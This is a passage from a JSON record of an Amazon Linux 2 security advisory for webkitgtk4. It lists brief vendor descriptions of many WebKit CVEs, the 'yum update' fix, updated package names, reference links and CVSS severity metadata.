write issues were addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.5, watchOS 8.7, tvOS 15.6, iOS 15.6 and iPadOS 15.6. An app may be able to disclose kernel memory. (CVE-2022-32793)\n\nThe issue was addressed with improved UI handling. This issue is fixed in watchOS 8.7, tvOS 15.6, iOS 15.6 and iPadOS 15.6, macOS Monterey 12.5. Visiting a website that frames malicious content may lead to UI spoofing. (CVE-2022-32816)\n\nProcessing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-32885)\n\nAn out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.7, macOS Ventura 13, iOS 16, iOS 15.7 and iPadOS 15.7, watchOS 9, macOS Monterey 12.6, tvOS 16. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-32888)\n\nA correctness issue in the JIT was addressed with improved checks. This issue is fixed in tvOS 16.1, iOS 15.7.1 and iPadOS 15.7.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Processing maliciously crafted web content may disclose internal states of the app. (CVE-2022-32923)\n\nThe issue was addressed with improved UI handling. This issue is fixed in tvOS 16.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Visiting a malicious website may lead to user interface spoofing. (CVE-2022-42799)\n\nA logic issue was addressed with improved state management. This issue is fixed in tvOS 16.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-42824)\n\nProcessing maliciously crafted web content may lead to arbitrary code execution\n\nRESERVED \nNOTE: https://webkitgtk.org/security/WSA-2023-0001.html (CVE-2022-42826)\n\nThe issue was addressed with improved memory handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may result in the disclosure of process memory. (CVE-2022-42852)\n\nA type confusion issue was addressed with improved state handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.1.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.. (CVE-2022-42856)\n\nA memory corruption issue was addressed with improved state management. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-42863)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-42867)\n\nA memory consumption issue was addressed with improved memory handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-46691)\n\nA logic issue was addressed with improved state management. This issue is fixed in Safari 16.2, tvOS 16.2, iCloud for Windows 14.1, iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may bypass Same Origin Policy. (CVE-2022-46692)\n\nA logic issue was addressed with improved checks. This issue is fixed in Safari 16.2, tvOS 16.2, iCloud for Windows 14.1, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-46698)\n\nA memory corruption issue was addressed with improved state management. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-46699)\n\nA memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-46700)\n\nA flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. (CVE-2023-2203)\n\nProcessing maliciously crafted web content may lead to arbitrary code execution (CVE-2023-23517)\n\nProcessing maliciously crafted web content may lead to arbitrary code execution (CVE-2023-23518)\n\nA vulnerability was found in WebKitGTK. This issue occurs when processing maliciously crafted web content in WebKit. This may, in theory, allow a remote attacker to create a specially crafted web page, trick the victim into opening it, trigger type confusion, and execute arbitrary code on the target system. (CVE-2023-23529)\n\nA use-after-free vulnerability in WebCore::RenderLayer::addChild in WebKitGTK before 2.36.8 allows attackers to execute code remotely. (CVE-2023-25358)\n\nA use-after-free vulnerability in WebCore::RenderLayer::renderer in WebKitGTK before 2.36.8 allows attackers to execute code remotely. (CVE-2023-25360)\n\nA use-after-free vulnerability in WebCore::RenderLayer::setNextSibling in WebKitGTK before 2.36.8 allows attackers to execute code remotely. (CVE-2023-25361)\n\nA use-after-free vulnerability in WebCore::RenderLayer::repaintBlockSelectionGaps in WebKitGTK before 2.36.8 allows attackers to execute code remotely. (CVE-2023-25362)\n\nA use-after-free vulnerability in WebCore::RenderLayer::updateDescendantDependentFlags in WebKitGTK before 2.36.8 allows attackers to execute code remotely. (CVE-2023-25363)\n\nThe vulnerability allows a remote attacker to bypass Same Origin Policy restrictions. (CVE-2023-27932)\n\nThe vulnerability exists due to excessive data output by the application. A remote attacker can track sensitive user information. (CVE-2023-27954)\n\nAn out-of-bounds read issue in WebKit that could be abused to disclose sensitive information when processing web content. It was addressed with improved input validation. (CVE-2023-28204)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nA use-after free bug in WebKit that could lead to arbitrary code execution when processing maliciously crafted web content. It was addressed with improved memory management. (CVE-2023-32373)\n\nN/A (CVE-2023-32409)\n\n \n**Affected Packages:** \n\n\nwebkitgtk4\n\n \n**Issue Correction:** \nRun _yum update webkitgtk4_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 webkitgtk4-2.38.5-3.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 webkitgtk4-devel-2.38.5-3.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-2.38.5-3.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-devel-2.38.5-3.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 webkitgtk4-debuginfo-2.38.5-3.amzn2.0.1.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 webkitgtk4-2.38.5-3.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 webkitgtk4-devel-2.38.5-3.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-2.38.5-3.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-devel-2.38.5-3.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 webkitgtk4-debuginfo-2.38.5-3.amzn2.0.1.i686 \n \n src: \n \u00a0\u00a0\u00a0 webkitgtk4-2.38.5-3.amzn2.0.1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 webkitgtk4-2.38.5-3.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 webkitgtk4-devel-2.38.5-3.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-2.38.5-3.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-devel-2.38.5-3.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 webkitgtk4-debuginfo-2.38.5-3.amzn2.0.1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2020-22592](<https://access.redhat.com/security/cve/CVE-2020-22592>), [CVE-2020-27918](<https://access.redhat.com/security/cve/CVE-2020-27918>), [CVE-2020-29623](<https://access.redhat.com/security/cve/CVE-2020-29623>), [CVE-2021-1765](<https://access.redhat.com/security/cve/CVE-2021-1765>), [CVE-2021-1788](<https://access.redhat.com/security/cve/CVE-2021-1788>), [CVE-2021-1789](<https://access.redhat.com/security/cve/CVE-2021-1789>), [CVE-2021-1799](<https://access.redhat.com/security/cve/CVE-2021-1799>), [CVE-2021-1801](<https://access.redhat.com/security/cve/CVE-2021-1801>), [CVE-2021-1817](<https://access.redhat.com/security/cve/CVE-2021-1817>), [CVE-2021-1820](<https://access.redhat.com/security/cve/CVE-2021-1820>), [CVE-2021-1825](<https://access.redhat.com/security/cve/CVE-2021-1825>), [CVE-2021-1826](<https://access.redhat.com/security/cve/CVE-2021-1826>), [CVE-2021-1844](<https://access.redhat.com/security/cve/CVE-2021-1844>), [CVE-2021-1870](<https://access.redhat.com/security/cve/CVE-2021-1870>), [CVE-2021-21775](<https://access.redhat.com/security/cve/CVE-2021-21775>), [CVE-2021-21779](<https://access.redhat.com/security/cve/CVE-2021-21779>), [CVE-2021-21806](<https://access.redhat.com/security/cve/CVE-2021-21806>), [CVE-2021-30661](<https://access.redhat.com/security/cve/CVE-2021-30661>), [CVE-2021-30663](<https://access.redhat.com/security/cve/CVE-2021-30663>), [CVE-2021-30665](<https://access.redhat.com/security/cve/CVE-2021-30665>), [CVE-2021-30666](<https://access.redhat.com/security/cve/CVE-2021-30666>), [CVE-2021-30682](<https://access.redhat.com/security/cve/CVE-2021-30682>), [CVE-2021-30689](<https://access.redhat.com/security/cve/CVE-2021-30689>), [CVE-2021-30720](<https://access.redhat.com/security/cve/CVE-2021-30720>), [CVE-2021-30734](<https://access.redhat.com/security/cve/CVE-2021-30734>), [CVE-2021-30744](<https://access.redhat.com/security/cve/CVE-2021-30744>), [CVE-2021-30749](<https://access.redhat.com/security/cve/CVE-2021-30749>), [CVE-2021-30758](<https://access.redhat.com/security/cve/CVE-2021-30758>), [CVE-2021-30761](<https://access.redhat.com/security/cve/CVE-2021-30761>), [CVE-2021-30762](<https://access.redhat.com/security/cve/CVE-2021-30762>), [CVE-2021-30795](<https://access.redhat.com/security/cve/CVE-2021-30795>), [CVE-2021-30797](<https://access.redhat.com/security/cve/CVE-2021-30797>), [CVE-2021-30799](<https://access.redhat.com/security/cve/CVE-2021-30799>), [CVE-2021-30809](<https://access.redhat.com/security/cve/CVE-2021-30809>), [CVE-2021-30818](<https://access.redhat.com/security/cve/CVE-2021-30818>), [CVE-2021-30836](<https://access.redhat.com/security/cve/CVE-2021-30836>), [CVE-2021-30846](<https://access.redhat.com/security/cve/CVE-2021-30846>), [CVE-2021-30848](<https://access.redhat.com/security/cve/CVE-2021-30848>), [CVE-2021-30849](<https://access.redhat.com/security/cve/CVE-2021-30849>), [CVE-2021-30851](<https://access.redhat.com/security/cve/CVE-2021-30851>), [CVE-2021-30887](<https://access.redhat.com/security/cve/CVE-2021-30887>), [CVE-2021-30888](<https://access.redhat.com/security/cve/CVE-2021-30888>), [CVE-2021-30889](<https://access.redhat.com/security/cve/CVE-2021-30889>), [CVE-2021-30890](<https://access.redhat.com/security/cve/CVE-2021-30890>), [CVE-2021-30934](<https://access.redhat.com/security/cve/CVE-2021-30934>), [CVE-2021-30936](<https://access.redhat.com/security/cve/CVE-2021-30936>), [CVE-2021-30951](<https://access.redhat.com/security/cve/CVE-2021-30951>), [CVE-2021-30952](<https://access.redhat.com/security/cve/CVE-2021-30952>), [CVE-2021-30953](<https://access.redhat.com/security/cve/CVE-2021-30953>), [CVE-2021-30954](<https://access.redhat.com/security/cve/CVE-2021-30954>), [CVE-2021-30984](<https://access.redhat.com/security/cve/CVE-2021-30984>), [CVE-2021-32912](<https://access.redhat.com/security/cve/CVE-2021-32912>), [CVE-2021-42762](<https://access.redhat.com/security/cve/CVE-2021-42762>), [CVE-2021-45481](<https://access.redhat.com/security/cve/CVE-2021-45481>), [CVE-2021-45482](<https://access.redhat.com/security/cve/CVE-2021-45482>), [CVE-2021-45483](<https://access.redhat.com/security/cve/CVE-2021-45483>), [CVE-2022-22590](<https://access.redhat.com/security/cve/CVE-2022-22590>), [CVE-2022-22592](<https://access.redhat.com/security/cve/CVE-2022-22592>), [CVE-2022-22662](<https://access.redhat.com/security/cve/CVE-2022-22662>), [CVE-2022-22677](<https://access.redhat.com/security/cve/CVE-2022-22677>), [CVE-2022-26700](<https://access.redhat.com/security/cve/CVE-2022-26700>), [CVE-2022-26709](<https://access.redhat.com/security/cve/CVE-2022-26709>), [CVE-2022-26710](<https://access.redhat.com/security/cve/CVE-2022-26710>), [CVE-2022-26716](<https://access.redhat.com/security/cve/CVE-2022-26716>), [CVE-2022-26717](<https://access.redhat.com/security/cve/CVE-2022-26717>), [CVE-2022-26719](<https://access.redhat.com/security/cve/CVE-2022-26719>), [CVE-2022-30293](<https://access.redhat.com/security/cve/CVE-2022-30293>), [CVE-2022-32792](<https://access.redhat.com/security/cve/CVE-2022-32792>), [CVE-2022-32793](<https://access.redhat.com/security/cve/CVE-2022-32793>), [CVE-2022-32816](<https://access.redhat.com/security/cve/CVE-2022-32816>), [CVE-2022-32885](<https://access.redhat.com/security/cve/CVE-2022-32885>), [CVE-2022-32888](<https://access.redhat.com/security/cve/CVE-2022-32888>), [CVE-2022-32923](<https://access.redhat.com/security/cve/CVE-2022-32923>), [CVE-2022-42799](<https://access.redhat.com/security/cve/CVE-2022-42799>), [CVE-2022-42824](<https://access.redhat.com/security/cve/CVE-2022-42824>), [CVE-2022-42826](<https://access.redhat.com/security/cve/CVE-2022-42826>), [CVE-2022-42852](<https://access.redhat.com/security/cve/CVE-2022-42852>), [CVE-2022-42856](<https://access.redhat.com/security/cve/CVE-2022-42856>), [CVE-2022-42863](<https://access.redhat.com/security/cve/CVE-2022-42863>), [CVE-2022-42867](<https://access.redhat.com/security/cve/CVE-2022-42867>), [CVE-2022-46691](<https://access.redhat.com/security/cve/CVE-2022-46691>), [CVE-2022-46692](<https://access.redhat.com/security/cve/CVE-2022-46692>), [CVE-2022-46698](<https://access.redhat.com/security/cve/CVE-2022-46698>), [CVE-2022-46699](<https://access.redhat.com/security/cve/CVE-2022-46699>), [CVE-2022-46700](<https://access.redhat.com/security/cve/CVE-2022-46700>), [CVE-2023-2203](<https://access.redhat.com/security/cve/CVE-2023-2203>), [CVE-2023-23517](<https://access.redhat.com/security/cve/CVE-2023-23517>), [CVE-2023-23518](<https://access.redhat.com/security/cve/CVE-2023-23518>), [CVE-2023-23529](<https://access.redhat.com/security/cve/CVE-2023-23529>), [CVE-2023-25358](<https://access.redhat.com/security/cve/CVE-2023-25358>), [CVE-2023-25360](<https://access.redhat.com/security/cve/CVE-2023-25360>), [CVE-2023-25361](<https://access.redhat.com/security/cve/CVE-2023-25361>), [CVE-2023-25362](<https://access.redhat.com/security/cve/CVE-2023-25362>), [CVE-2023-25363](<https://access.redhat.com/security/cve/CVE-2023-25363>), [CVE-2023-27932](<https://access.redhat.com/security/cve/CVE-2023-27932>), [CVE-2023-27954](<https://access.redhat.com/security/cve/CVE-2023-27954>), [CVE-2023-28204](<https://access.redhat.com/security/cve/CVE-2023-28204>), [CVE-2023-28205](<https://access.redhat.com/security/cve/CVE-2023-28205>), [CVE-2023-32373](<https://access.redhat.com/security/cve/CVE-2023-32373>), [CVE-2023-32409](<https://access.redhat.com/security/cve/CVE-2023-32409>)\n\nMitre: [CVE-2020-22592](<https://vulners.com/cve/CVE-2020-22592>), [CVE-2020-27918](<https://vulners.com/cve/CVE-2020-27918>), [CVE-2020-29623](<https://vulners.com/cve/CVE-2020-29623>), [CVE-2021-1765](<https://vulners.com/cve/CVE-2021-1765>), [CVE-2021-1788](<https://vulners.com/cve/CVE-2021-1788>), [CVE-2021-1789](<https://vulners.com/cve/CVE-2021-1789>), [CVE-2021-1799](<https://vulners.com/cve/CVE-2021-1799>), [CVE-2021-1801](<https://vulners.com/cve/CVE-2021-1801>), [CVE-2021-1817](<https://vulners.com/cve/CVE-2021-1817>), [CVE-2021-1820](<https://vulners.com/cve/CVE-2021-1820>), [CVE-2021-1825](<https://vulners.com/cve/CVE-2021-1825>), [CVE-2021-1826](<https://vulners.com/cve/CVE-2021-1826>), [CVE-2021-1844](<https://vulners.com/cve/CVE-2021-1844>), [CVE-2021-1870](<https://vulners.com/cve/CVE-2021-1870>), [CVE-2021-21775](<https://vulners.com/cve/CVE-2021-21775>), [CVE-2021-21779](<https://vulners.com/cve/CVE-2021-21779>), [CVE-2021-21806](<https://vulners.com/cve/CVE-2021-21806>), [CVE-2021-30661](<https://vulners.com/cve/CVE-2021-30661>), [CVE-2021-30663](<https://vulners.com/cve/CVE-2021-30663>), [CVE-2021-30665](<https://vulners.com/cve/CVE-2021-30665>), [CVE-2021-30666](<https://vulners.com/cve/CVE-2021-30666>), [CVE-2021-30682](<https://vulners.com/cve/CVE-2021-30682>), [CVE-2021-30689](<https://vulners.com/cve/CVE-2021-30689>), [CVE-2021-30720](<https://vulners.com/cve/CVE-2021-30720>), [CVE-2021-30734](<https://vulners.com/cve/CVE-2021-30734>), [CVE-2021-30744](<https://vulners.com/cve/CVE-2021-30744>), [CVE-2021-30749](<https://vulners.com/cve/CVE-2021-30749>), [CVE-2021-30758](<https://vulners.com/cve/CVE-2021-30758>), [CVE-2021-30761](<https://vulners.com/cve/CVE-2021-30761>), [CVE-2021-30762](<https://vulners.com/cve/CVE-2021-30762>), [CVE-2021-30795](<https://vulners.com/cve/CVE-2021-30795>), [CVE-2021-30797](<https://vulners.com/cve/CVE-2021-30797>), [CVE-2021-30799](<https://vulners.com/cve/CVE-2021-30799>), [CVE-2021-30809](<https://vulners.com/cve/CVE-2021-30809>), [CVE-2021-30818](<https://vulners.com/cve/CVE-2021-30818>), [CVE-2021-30836](<https://vulners.com/cve/CVE-2021-30836>), [CVE-2021-30846](<https://vulners.com/cve/CVE-2021-30846>), [CVE-2021-30848](<https://vulners.com/cve/CVE-2021-30848>), [CVE-2021-30849](<https://vulners.com/cve/CVE-2021-30849>), [CVE-2021-30851](<https://vulners.com/cve/CVE-2021-30851>), [CVE-2021-30887](<https://vulners.com/cve/CVE-2021-30887>), [CVE-2021-30888](<https://vulners.com/cve/CVE-2021-30888>), [CVE-2021-30889](<https://vulners.com/cve/CVE-2021-30889>), [CVE-2021-30890](<https://vulners.com/cve/CVE-2021-30890>), [CVE-2021-30934](<https://vulners.com/cve/CVE-2021-30934>), [CVE-2021-30936](<https://vulners.com/cve/CVE-2021-30936>), [CVE-2021-30951](<https://vulners.com/cve/CVE-2021-30951>), [CVE-2021-30952](<https://vulners.com/cve/CVE-2021-30952>), [CVE-2021-30953](<https://vulners.com/cve/CVE-2021-30953>), [CVE-2021-30954](<https://vulners.com/cve/CVE-2021-30954>), [CVE-2021-30984](<https://vulners.com/cve/CVE-2021-30984>), [CVE-2021-32912](<https://vulners.com/cve/CVE-2021-32912>), [CVE-2021-42762](<https://vulners.com/cve/CVE-2021-42762>), [CVE-2021-45481](<https://vulners.com/cve/CVE-2021-45481>), [CVE-2021-45482](<https://vulners.com/cve/CVE-2021-45482>), [CVE-2021-45483](<https://vulners.com/cve/CVE-2021-45483>), [CVE-2022-22590](<https://vulners.com/cve/CVE-2022-22590>), [CVE-2022-22592](<https://vulners.com/cve/CVE-2022-22592>), [CVE-2022-22662](<https://vulners.com/cve/CVE-2022-22662>), [CVE-2022-22677](<https://vulners.com/cve/CVE-2022-22677>), [CVE-2022-26700](<https://vulners.com/cve/CVE-2022-26700>), [CVE-2022-26709](<https://vulners.com/cve/CVE-2022-26709>), [CVE-2022-26710](<https://vulners.com/cve/CVE-2022-26710>), [CVE-2022-26716](<https://vulners.com/cve/CVE-2022-26716>), [CVE-2022-26717](<https://vulners.com/cve/CVE-2022-26717>), [CVE-2022-26719](<https://vulners.com/cve/CVE-2022-26719>), [CVE-2022-30293](<https://vulners.com/cve/CVE-2022-30293>), [CVE-2022-32792](<https://vulners.com/cve/CVE-2022-32792>), [CVE-2022-32793](<https://vulners.com/cve/CVE-2022-32793>), [CVE-2022-32816](<https://vulners.com/cve/CVE-2022-32816>), [CVE-2022-32885](<https://vulners.com/cve/CVE-2022-32885>), [CVE-2022-32888](<https://vulners.com/cve/CVE-2022-32888>), [CVE-2022-32923](<https://vulners.com/cve/CVE-2022-32923>), [CVE-2022-42799](<https://vulners.com/cve/CVE-2022-42799>), [CVE-2022-42824](<https://vulners.com/cve/CVE-2022-42824>), [CVE-2022-42826](<https://vulners.com/cve/CVE-2022-42826>), [CVE-2022-42852](<https://vulners.com/cve/CVE-2022-42852>), [CVE-2022-42856](<https://vulners.com/cve/CVE-2022-42856>), [CVE-2022-42863](<https://vulners.com/cve/CVE-2022-42863>), [CVE-2022-42867](<https://vulners.com/cve/CVE-2022-42867>), [CVE-2022-46691](<https://vulners.com/cve/CVE-2022-46691>), [CVE-2022-46692](<https://vulners.com/cve/CVE-2022-46692>), [CVE-2022-46698](<https://vulners.com/cve/CVE-2022-46698>), [CVE-2022-46699](<https://vulners.com/cve/CVE-2022-46699>), [CVE-2022-46700](<https://vulners.com/cve/CVE-2022-46700>), [CVE-2023-2203](<https://vulners.com/cve/CVE-2023-2203>), [CVE-2023-23517](<https://vulners.com/cve/CVE-2023-23517>), [CVE-2023-23518](<https://vulners.com/cve/CVE-2023-23518>), [CVE-2023-23529](<https://vulners.com/cve/CVE-2023-23529>), [CVE-2023-25358](<https://vulners.com/cve/CVE-2023-25358>), [CVE-2023-25360](<https://vulners.com/cve/CVE-2023-25360>), [CVE-2023-25361](<https://vulners.com/cve/CVE-2023-25361>), [CVE-2023-25362](<https://vulners.com/cve/CVE-2023-25362>), [CVE-2023-25363](<https://vulners.com/cve/CVE-2023-25363>), [CVE-2023-27932](<https://vulners.com/cve/CVE-2023-27932>), [CVE-2023-27954](<https://vulners.com/cve/CVE-2023-27954>), [CVE-2023-28204](<https://vulners.com/cve/CVE-2023-28204>), [CVE-2023-28205](<https://vulners.com/cve/CVE-2023-28205>), [CVE-2023-32373](<https://vulners.com/cve/CVE-2023-32373>), [CVE-2023-32409](<https://vulners.com/cve/CVE-2023-32409>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-07T23:52:00", "type": "amazon", "title": "Important: webkitgtk4", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-22592", "CVE-2020-27918", "CVE-2020-29623", "CVE-2021-1765", "CVE-2021-1788", "CVE-2021-1789", "CVE-2021-1799", "CVE-2021-1801", "CVE-2021-1817", "CVE-2021-1820", "CVE-2021-1825", "CVE-2021-1826", "CVE-2021-1844", "CVE-2021-1870", "CVE-2021-21775", "CVE-2021-21779", "CVE-2021-21806", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30682", "CVE-2021-30689", "CVE-2021-30720", "CVE-2021-30734", "CVE-2021-30744", "CVE-2021-30749", "CVE-2021-30758", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30795", "CVE-2021-30797", "CVE-2021-30799", "CVE-2021-30809", "CVE-2021-30818", "CVE-2021-30836", "CVE-2021-30846", "CVE-2021-30848", "CVE-2021-30849", "CVE-2021-30851", "CVE-2021-30887", "CVE-2021-30888", "CVE-2021-30889", "CVE-2021-30890", "CVE-2021-30934", "CVE-2021-30936", "CVE-2021-30951", "CVE-2021-30952", "CVE-2021-30953", "CVE-2021-30954", "CVE-2021-30984", "CVE-2021-32912", "CVE-2021-41133", "CVE-2021-42762", "CVE-2021-45481", "CVE-2021-45482", "CVE-2021-45483", "CVE-2022-22590", "CVE-2022-22592", "CVE-2022-22662", "CVE-2022-22677", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293", "CVE-2022-32792", "CVE-2022-32793", "CVE-2022-32816", "CVE-2022-32885", "CVE-2022-32888", "CVE-2022-32923", "CVE-2022-42799", "CVE-2022-42824", "CVE-2022-42826", "CVE-2022-42852", "CVE-2022-42856", "CVE-2022-42863", "CVE-2022-42867", "CVE-2022-46691", "CVE-2022-46692", "CVE-2022-46698", "CVE-2022-46699", "CVE-2022-46700", "CVE-2023-2203", "CVE-2023-23517", "CVE-2023-23518", "CVE-2023-23529", "CVE-2023-25358", "CVE-2023-25360", "CVE-2023-25361", "CVE-2023-25362", "CVE-2023-25363", "CVE-2023-27932", "CVE-2023-27954", "CVE-2023-28204", "CVE-2023-28205", "CVE-2023-32373", "CVE-2023-32409"], "modified": "2023-06-12T23:09:00", "id": "ALAS2-2023-2088", "href": "https://alas.aws.amazon.com/AL2/ALAS-2023-2088.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}